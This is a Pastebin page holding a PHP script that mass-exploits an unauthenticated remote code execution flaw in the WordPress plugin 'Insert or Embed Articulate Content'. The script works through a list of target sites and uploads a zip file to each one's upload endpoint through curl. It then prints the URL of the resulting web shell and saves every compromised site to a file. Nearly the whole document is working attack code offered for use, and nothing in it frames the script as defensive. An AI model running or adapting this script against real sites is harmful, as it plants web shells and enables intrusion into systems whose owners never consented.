SHARE
TWEET

WordPress Plugin Insert or Embed Articulate Content

ustadcage_48 Jun 25th, 2019 (edited) 443 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. # Coded by UstadCage_48
  4. # WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution (Unautorized)
  5. # https://www.exploitkita.org/2019/06/wordpress-plugin-insert-or-embed.html?m=1
  6. # Exploit-Kita.org
  7. # Author : Rinto (con7ext)
  8. # Usage : php tools.php list.txt
  9. # File : https://drive.google.com/file/d/1-5Dbrb4QG_wUTq5e7FsWWXQMLjlbehL0/view?usp=drivesdk
  10. # Don't Change Name File tadd.zip !
  11.  
  12. error_reporting(0);
  13. function sv($site,$ext){
  14. $fp = fopen("$ext.txt", 'a');
  15. fwrite($fp, "$site\n");
  16. fclose($fp);
  17. }
  18. $kuning = "\033[93m";
  19. $ungu = "\033[95m";
  20. $biru = "\033[94m";
  21. $merah = "\033[91m";
  22. $hijau = "\033[92m";
  23. $tad = explode("\n",file_get_contents($argv[1]));
  24. foreach($tad as $lusi){
  25.     // coba
  26.     $up = shell_exec('curl -s -F "name=tadd.zip" -F "chunk=2" -F "chunks=3" -F "file=@tadd.zip" '.$lusi.'/index.php/wp-json/articulate/v1/upload-data');
  27.      preg_match('/"path" : "(.*?)",/',$up,$path);
  28.     if(preg_match('/Upload Complete/',$up)){
  29. $parse = parse_url($lusi.$path[1]);
  30. $pattern = '~\w+\.html~';
  31. $parse = preg_replace($pattern, '', $parse);
  32. $site = $parse['scheme'].'://'.$parse['host'].$parse['path'];
  33. $str = str_replace("\/","/",$site);
  34.     echo "$ungu [$] $hijau Target : $kuning ".$lusi."\n";
  35.     echo "$ungu [$] $hijau Shellx : $ungu : $hijau ".$str."index.php?x=ls\n\n";
  36.     sv($str."index.php?x=ls","wp");
  37. } else {
  38.     echo "$ungu [$] $kuning $lusi$ungu : $merah No Vulnerable \n\n";
  39. }
  40. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top